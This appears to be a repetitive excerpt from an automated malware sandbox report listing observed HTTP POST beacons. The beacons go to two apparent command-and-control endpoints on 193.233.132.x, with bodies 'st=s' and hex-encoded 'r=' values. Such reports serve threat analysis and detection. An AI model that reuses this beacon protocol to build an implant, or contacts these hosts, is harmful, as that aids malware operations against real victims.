Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
